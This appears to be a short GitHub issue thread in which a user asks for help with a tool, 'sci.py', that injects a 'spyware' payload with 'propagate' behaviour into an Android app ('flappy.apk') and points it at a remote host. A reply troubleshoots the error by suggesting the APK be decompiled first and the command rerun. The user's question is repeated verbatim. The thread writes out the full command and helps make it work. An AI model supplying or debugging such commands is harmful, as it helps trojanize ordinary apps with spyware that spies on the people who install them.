Open pretech86 opened 4 years ago
i used this command python3 sci.py -a /root/Desktop/flappy.apk payload spyware -ppg propagate -rh 192.168.8.123 and it give the following error FileNotFoundError: [Errno 2] No such file or directory: '../tmp/classes.dex'
can you help me please
Try Decompiling the flappy.apk first then run your command again like this
python3 sci.py -a /root/Desktop/flappy payload spyware -ppg propagate -rh 192.168.8.123
Maybe that might work.
i used this command python3 sci.py -a /root/Desktop/flappy.apk payload spyware -ppg propagate -rh 192.168.8.123 and it give the following error FileNotFoundError: [Errno 2] No such file or directory: '../tmp/classes.dex'
can you help me please